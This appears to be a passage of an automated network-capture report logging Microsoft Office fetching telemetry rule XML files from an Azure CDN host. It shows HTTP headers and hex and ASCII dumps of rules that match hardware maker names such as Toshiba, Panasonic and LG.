                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:06 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 46a88b53-101e-0017-7e74-2747c7000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182006Z-16849878b78wv88bk51myq5vxc0000000a5000000000h9a2
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:07 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      121192.168.2.45128613.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:07 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:07 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 420
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 51984752-001e-0017-1f58-2b0c3c000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182007Z-17c5cb586f626sn8grcgm1gf8000000008ag00000000g0wx
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:08 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      122192.168.2.45128713.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:07 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:07 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 3a8fd219-b01e-0084-5fd4-2ad736000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182007Z-159b85dff8fc5h75hC1DFWntr800000001d000000000bq9r
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:08 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      123192.168.2.45128813.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:07 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:07 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 3601e2f9-501e-0064-27bd-2a1f54000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182007Z-17c5cb586f6zcqf8r7the4ske0000000029g000000005bc0
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:08 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      124192.168.2.45128913.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:07 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:07 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: daa440d4-101e-0028-4cca-2a8f64000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182007Z-159b85dff8fdthgkhC1DFWk0rw00000001tg00000000g73k
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:08 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      125192.168.2.45129013.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:07 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:08 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:07 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 423
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 5e4053db-f01e-0052-6472-279224000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182007Z-16849878b78sx229w7g7at4nkg000000084000000000hbaq
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:08 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      126192.168.2.45129513.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:10 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:10 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 479
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 82dd15c7-901e-0064-46c7-2ae8a6000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182010Z-159b85dff8f7svrvhC1DFWth2s00000001ug00000000dh4h
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:10 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      127192.168.2.45129413.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:10 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:10 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 400
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: a96fbf53-401e-0016-5d5d-2653e0000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182010Z-16849878b78qf2gleqhwczd21s0000000a4g0000000084qk
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:10 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      128192.168.2.45129313.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:10 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:10 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: f3394f62-601e-0070-07f3-2aa0c9000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182010Z-16849878b78qg9mlz11wgn0wcc00000009eg00000000hung
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
